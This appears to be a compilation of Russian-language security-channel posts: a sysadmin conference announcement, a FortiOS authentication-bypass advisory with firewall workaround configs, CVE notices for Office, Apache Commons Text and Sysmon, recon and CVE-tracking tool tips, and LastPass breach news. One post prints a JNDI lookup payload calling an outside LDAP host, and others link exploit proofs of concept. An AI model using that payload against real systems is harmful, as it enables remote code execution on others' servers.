Open SysConf'22 - Сети, Ansible шаблонизация и не только
 
До нашей встречи на Open SysConf в г.Алматы осталось практически 10 дней и я рад презентовать Вам финальные темы докладов:

Сети (хуети) в современном датацентре
- Автор: Айдар Оспанбеков. Архитектор облака PS.kz.
- Краткое описание: С какими проблемами мы столкнулись при эксплуатации сети в публичном облаке; Как и для чего мы отказывались от VLAN в пользу VxLAN; Как строили сеть по топологии spine-leaf с BGP и FRRouting

Шаблонизация Linux систем в организациях
- Автор: Нурбиби "R0b0Cat". Системный администратор.
- Краткое описание: Доклад для тех кому нужно произвести в единый формат linux дистрибутивы в организации

Неявный превентинг констракшн
- Автор: Yevgeniy "sysadminkz". Sys-Adm.in
- Краткое описание: Неявный превентинг - такого термина в интернете не нашел, поэтому расскажу о том, как я вижу defencive подход с позиции неявной превентивной защиты. Создадим новый термин и его понимание прямо в реалтайме ✌️

Голова чтобы думать, ноги чтобы ходить - приходи на Open SysConf 14 октября в SmartPoint, г.Алматы.

Детали на сайте: https://sysconf.io
 

https://tttttt.me/in6uz?livestream
Стрим обзор сканера уязвимостей сетевых протоколов Above
https://github.com/in9uz/Above

https://twitter.com/naglinagli/status/1580622895734460416?t=6rg9INmiw19VEyNj1JPd_Q&s=09

PoC for FortiOS CVE-2022-40684

🚨Fortinet предлагает workaround в статье и я ее перевел на свой лад

Summary (Описание):

ПОЛНАЯ ЖОПА… Это обход аутентификации в веб интерфейсе. Хакерам достаточно отправить один PUT запрос чтобы добавить ключ ssh пользователю admin.

Exploitation Status (Статус эксплуатации):

Искать в логах IoC:

user=«Local_Process_Acess»

Workaround (Заплатка на жопу):

FortiOS:

Отключить нахуй HTTP/HTTPS интерфейс админа!

Настроить access list:

config firewall address

edit "my_allowed_addresses"

set subnet <MY IP> <MY SUBNET>

end

Создать Address Group:

config firewall addrgrp

edit "MGMT_IPs"

set member "my_allowed_addresses"

end


Создать Local-in политику для разрешения доступа к менеджмент интерфейсу (пример: port1) только для определенной группы:

config firewall local-in-policy

edit 1

set intf port1

set srcaddr "MGMT_IPs"

set dstaddr "all"

set action accept

set service HTTPS HTTP

set schedule "always"

set status enable

next

edit 2

set intf "any"

set srcaddr "all"

set dstaddr "all"

set action deny

set service HTTPS HTTP

set schedule "always"

set status enable

end

FortiProxy:

Отключить нахуй HTTP/HTTPS интерфейс админа!

Настроить access list для доступа к порту 1:

config system interface

edit port1

set dedicated-to management

set trust-ip-1 <MY IP> <MY SUBNET>

end

FortiSwitchManager:

Отключить нахуй HTTP/HTTPS интерфейс админа!

Affected Products (Продукты подавшие под раздачу)
FortiOS versions 5.x, 6.x are NOT impacted.
FortiOS version 7.2.0 through 7.2.1
FortiOS version 7.0.0 through 7.0.6
FortiProxy version 7.2.0
FortiProxy version 7.0.0 through 7.0.6
FortiSwitchManager version 7.2.0
FortiSwitchManager version 7.0.0

Solutions (Сделайте апргрейд ОС ASAP)
Please upgrade to FortiOS version 7.2.2 or above
Please upgrade to FortiOS version 7.0.7 or above
Please upgrade to FortiProxy version 7.2.1 or above
Please upgrade to FortiProxy version 7.0.7 or above
Please upgrade to FortiSwitchManager version 7.2.1 or above

Срочно обновлять офис…

Microsoft Word Remote Code Execution Vulnerability CVE-2022-41031 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41031) and Microsoft Office Graphics Remote Code Execution Vulnerability CVE-2022-38049 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38049)

#MSOffice #RCE #CVE

#CVE-2022-42889 #Apache #RCE #4Shell

Обнаружена критическая уязвимость в программном обеспечении Apache (CVE-2022-42889) именуемая 4Shell
CVE-ID: CVE-2022-42889
CVSS Score: 9.8
Дата публикации сведений об уязвимости: 17.10.2022
Уязвимые программные продукты:
• JDK 1.8.0_341
• JDK version 9.0-16.0
Рекомендации по устранению уязвимости:
В кратчайшие сроки обновить версию уязвимой библиотеки до актуальной.

Дополнительные материалы:
https://www.rapid7.com/blog/post/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/

---
Payload:
jxPathContext.getValue("javax.naming.InitialContext.doLookup(\"ldap://check.dnslog.cn/obj\")");

OpenSSL 3.0.7 is a security-fix release. The highest severity issue fixed in this release is CRITICAL (from 2016)

https://mta.openssl.org/pipermail/openssl-announce/2022-October/000238.html

Друзья, специально для вас, мы выложили запись докладов с большой сцены на наш YouTube-канал!

Вспомним еще раз, как это было!

DAY 1: GOVERNMENT AND BUSINESS DAY
https://youtu.be/Z5mVjVtRv5k

DAY 2: SECURE CODING/DEVELOPMENT DAY
https://youtu.be/xbbzEDE3mns

DAY 3: HACK DAY
https://youtu.be/XTBpW2kCjAM

Приятного просмотра!
Не забывайте подписываться на наш канал и ставить лайки🔥

ReNgine is a very complete recon tool that can be very helpful to centralize all your recon in one site.

Its main website defines it as: «The only web application recon tool you will ever need!«

Currently is capable of performing:
* Subdomain Discovery
* Vulnerability Detection
* IPs and Open Ports Identification
* Directory and files fuzzing
* Screenshot Gathering
* Endpoints Gathering
* OSINT

Отличная вещь, оч рекомендую

https://github.com/yogeshojha/rengine

https://cvetrends.com

Позволяет мониторить тенденций CVE в режиме реального времени. Агрегация информации: из Twitter, NIST NVD, Reddit и GitHub.

Рекомендую добавить во вкладку инструментария аналитика SOC либо выводит сразу на экран.

#Автоматизация рутинной работы

В дополнение к сервису выше,
Если Вам нужно переодически проверять наличие публично доступных POC для CVE и искать их руками по интернет-ресурсам это не по админски - просто добавьте симлинки на команды в ~/.bashrc или ~/.zshrc и затем обновите `source ~/.zshrc` :

//Эта выдаст всю информацию по конкретному CVE
Использовать как cve CVE-2022-42889

cve() {curl "https://poc-in-github.motikan2010.net/api/v1/?cve_id=$1" | jq '.pocs[]'}

//Эта выведет линки на гит репозитории с нужным CVE
cve_url CVE-2022-42889

cve_url() {curl "https://poc-in-github.motikan2010.net/api/v1/?cve_id=$1" | jq '.pocs[] | .html_url'}

Очень познавательное видео о том, как декриптить стандартную нагрузку Cobalt Strike beacon под powershell и доставать IP c2 сервера.

https://youtu.be/5GUx_6xWoeI

Вот такой же ролик, только для выдергивания IP из исполняемого файла с автоматизацией через CiberChef API + Postman (можно хоть Burp или python использовать)

https://www.youtube.com/watch?v=5Vz1CjzhvLg

Веселая история о зарождении форума Codeby.net и одноименной CTF команды на The Standoff Talks 2022 от нашего товарища Алексея Морозова

https://www.youtube.com/watch?v=cEyYsIFwJwI

https://youtu.be/KTB6qKbVdZE

Очень хороший доклад и для SOC и для Red Team

#news Будете смеяться, но LastPass опять подвергся взлому. В августе злоумышленники стянули их исходники и техдокументацию, а теперь получили доступ к стороннему облачному хранилищу, используя украденную ранее инфу. Ну а в хранилище, как водится, пользовательские данные.

Компания пока не спешит делиться подробностями, скрываясь за размытой формулировкой «‎определённые элементы пользовательской информации». Так что масштабы утечки станут ясны позднее. Как обычно, заверяют, что пароли в безопасности – у нас всё зашифровано и архитектура нулевого разглашения, все дела. Пароль-то, может, и последний, а вот взлом оказался совсем не последним.

@tomhunter

Вышел Sysmon 14.13 (закрыта #CVE-2022-41120 CVSS:3.1 7.8/6.8).
🔗 https://techcommunity.microsoft.com/t5/sysinternals-blog/active-directory-explorer-v1-52-contig-v1-82-and-sysmon-v14-13/ba-p/3685500

Поторопитесь ибо PoC так же вышел!
Here is #PoC for CVE-2022-41120 https://t.co/oXkBYi4bWk. I combined arb file delete and limited arb file write to get code execution as NT Authority\System.
🔗 https://github.com/Wh04m1001/SysmonEoP